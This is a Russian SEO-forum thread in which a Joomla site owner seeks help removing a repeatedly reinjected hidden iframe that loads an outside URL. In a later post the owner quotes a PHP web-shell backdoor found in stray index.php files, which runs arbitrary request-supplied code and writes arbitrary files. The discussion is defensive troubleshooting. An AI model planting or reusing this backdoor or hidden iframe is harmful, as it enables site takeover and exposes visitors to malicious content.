Войти

Войти | Регистрация
Поиск по сайту
Взвлом и прописывание вредоносного кода
Поиск  Правила 
Seo форум » Разработка сайтов » Взлом и защита
Страницы: 1 2 След.
Взвлом и прописывание вредоносного кода, Постоянно вписываю вредоносный код рекламы
#1
29 Января 2013 16:11
Здравствуйте. Сайт на Joomla 1.5. В файл index.php работающего шаблона посноянно прописывается вредоносная реклама, за что яндекс дает санкции. При удаленни данного кода все возвращается на место, при этом дата изменения файла не изменяется, как будто ничего не происходило. Код следующий
[/URL] <style>.sdfsd{margin:-100%;position:absolute;width:600px;height:240px;}</style><div class="sdfsd"><iframe src="_http://avanturist.info/language/english/mails/go.php_"></iframe></div>
От хостра нет толку. Проблема уже целый месяц. Данный код вписывается только на двух сайтах, где нормальная посещаемость. Что можно попробовать?
#2
29 Января 2013 16:46
а хер знает smile:wall:
#3
29 Января 2013 17:03
шаблоны/права доступа к папкам?
может быть саму джумлу где-то подпортить успели. 

Сравните модули с другими сайтами. 
Изменено: Ваше Величество - 29 Января 2013 17:04
#4
29 Января 2013 17:19
Если есть "чистые" бэкапы попробуйте восстановить...
Хочешь зарабатывать много? Отличные тексты для Вашего сайта Регистрация
#5
29 Января 2013 19:38
В том то и дело, что в чистый бэкап прописывается, права доступа на шаблоны ограничивал. Может какой код нужно искать определенный, через тотал?
#6
29 Января 2013 19:42
wilo, на шаблон, на папки с файлами движка. по возможности все что есть - 755
#7
29 Января 2013 19:58
Цитата
Ваше Величество пишет:
wilo, на шаблон, на папки с файлами движка. по возможности все что есть - 755
насоветуете сейчас smile:) index.php  всегда 644
> SEO продвижение Бизнес-Сайтов
#8
29 Января 2013 20:04
Согласен Сергей Макаренко. На index.php ставил 444 и все равно прописывалось. Даже дата изменения файла не менялась при данной записи. Что можно через тотал командер поискать, какие коды?
#9
29 Января 2013 20:11
Цитата
wilo пишет:
Согласен Сергей Макаренко. На index.php ставил 444 и все равно прописывалось. Даже дата изменения файла не менялась при данной записи. Что можно через тотал командер поискать, какие коды?
вопрос в лоб, у вас в тотале сохранены пароли к фтп ? если да, то поздравляю, у вас слили все пароли, меняйте пароли на почте, продуйте всю систему антивирусником, и смените пароли везде где возможно, и никогда не сохраняйте пароли в тотал-командер.
#10
29 Января 2013 20:16
wilo, Рекомендую обратиться http://www.cy-pr.com/forum/f80/t42141/
Хостинг Beget на СУПРе
#11
29 Января 2013 20:18
в тотале не работаю как фтп, он только для поиска текста в файлах для поиска определенного кода. пароли менял уже не помогает. Возможно прописан где то код eval_base кажись такая орфография.
#12
29 Января 2013 21:25
Пишите в личку, могу посмотреть и помочь с данным вопросом.
#13
29 Января 2013 22:08
Цитата
wilo пишет:
Здравствуйте. Сайт на Joomla 1.5. В файл index.php работающего шаблона посноянно прописывается вредоносная реклама, за что яндекс дает санкции. При удаленни данного кода все возвращается на место, при этом дата изменения файла не изменяется, как будто ничего не происходило. Код следующий
[/URL] <style>.sdfsd{margin:-100%;position:absolute;width:600px;height:240px;}</style><div class="sdfsd"><iframe src="_avanturist.info/language/english/mails/go.php_"></iframe></div>
От хостра нет толку. Проблема уже целый месяц. Данный код вписывается только на двух сайтах, где нормальная посещаемость. Что можно попробовать?

А соседние файлы на содержимое не смотрел? smile;) Например, COPYRIGHT? smile:))
#14
29 Января 2013 22:56
На форуме есть тема, где предлагают провести проверку на уязвимость, за ссылку.
Система управления проектами
#15
31 Января 2013 18:19
Добрый день Всем. Спс за помощь. Просматриваю все файлы, т.к. сказать. Есть одно подозрение. Что это за код?
<?php    $bshd = "94784b2bd4d50c884a0b44d06b6aa4d6"; if(isset($_REQUEST['ndwv'])) { $rzgcvo = $_REQUEST['ndwv']; eval($rzgcvo); exit(0); } if(isset($_REQUEST['upxpasw'])) { $zqstfam = $_REQUEST['pyydcuyr']; $yxoulg = $_REQUEST['upxpasw']; $bedcxz = fopen($yxoulg, 'w'); $wqoqwpcu = fwrite($bedcxz, $zqstfam); fclose($bedcxz); echo $wqoqwpcu; exit(); }
?>

Присутствует в отдельных файлах index.php в местах где их не должно быть, в оригинальных установочных архивах.
Изменено: wilo - 31 Января 2013 18:31
 
Страницы: 1 2 След.
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:49 Как правильно покупать ссылки для поддомена? 
18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 
12:53 где много готовых фавиконок 
22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 
23:27 Adfinity - Ваш надежный партнер в монетизации трафика 
16:55 Инструменты для массового постинга в WordPress 
01:53 Европейский эквайринг 
20:19 GoogleWalker - устранение конкурентов в Google Ads | Автоматизированная система склика | АНТИБАН 
16:39 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
11:07 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
11:01 Защитим твой ресурс от блокировки Роскомнадзора 
10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 
06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:52 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 
02:50 Точные прогнозы на футбол 
02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 
21:19 С юмором по жизни! 
18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 
18:19 Уникальный сервис SEO продвижения 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.11.2023 (441 день назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 05.09.2024 (154 дня назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Ютуб - продвижение и заработок
—  Криптовалюта на 1 000 000$
—  Баннерообменная бизнес сеть. Заработок без вложений.
—  Развитие канала в Яндекс Дзен
—  Новая акция 2024: Заработай* до 5 432 руб. за пару минут** просто, бесплатно и без смс. Сможет даже новичок


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050